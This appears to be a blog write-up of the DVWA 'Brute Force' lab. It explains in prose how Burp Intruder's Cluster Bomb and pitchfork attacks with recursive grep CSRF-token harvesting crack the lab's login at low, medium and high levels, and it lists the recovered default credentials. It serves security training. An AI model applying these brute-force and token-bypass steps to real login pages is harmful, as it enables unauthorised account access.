Brute Force | DVWA Writeups

4 min readDec 17, 2023

Imagine a hacker trying every single key on a keyring until they unlock a door. That’s the essence of a brute-force attack on passwords and usernames. They bombard a system with countless combinations of usernames and passwords, hoping to stumble upon the right one that grants them unauthorized access. It’s a simple, time-consuming approach, but surprisingly effective against weak passwords like “12345” or “password1”. Strong passwords, however, act like intricate locks, making brute-forcing a frustratingly slow and ultimately futile exercise. The key takeaway? Use strong, unique passwords and keep your accounts well-guarded against these digital lockpicks.

Security Level: Low

The source code for low security level can be seen below:

Given a login page, the credentials ‘test’ for both the username and password were provided for testing purposes.

The Intruder received the request in Burp proxy upon pressing Ctrl+I.

The chosen attack method is Cluster Bomb, wherein a distinct payload is applied for each specified position in the iteration process.

The payload position was first cleared and then set for username and password.

Payload set 1 contained the probable usernames and Payload set 2 was for passwords.

Conducting the attack yielded a list of usernames and passwords, organized according to their respective lengths.

gordonb: abc123
smithy: password
pablo: letmein
admin: password
1337: charley

Security Level: Medium

The source code for the medium security level can be seen below:

Examining the source code revealed a 2-second delay following each unsuccessful login attempt. The procedures remain consistent between medium and low levels.

Security Level: High

The source code for the high security level can be seen below:

The utilization of a CSRF token was integral to maintaining a high level of security. This token, generated by the server-side application, is a distinct, confidential, and unpredictable value that is then communicated to the client.

The payload position was configured, employing a pitchfork attack with Payload 1 configured as a Simple list and Payload 2 set as a recursive grep.

A custom resource pool was employed due to the incompatibility of recursive grep payloads with multiple request threads. The maximum allowable concurrent requests for the custom resource pool were configured to be 1.

The token was obtained from the webpage, concealed in a hidden location. For every login attempt, Burp had to retrieve the value from that specific location to carry out a brute force attack on the login.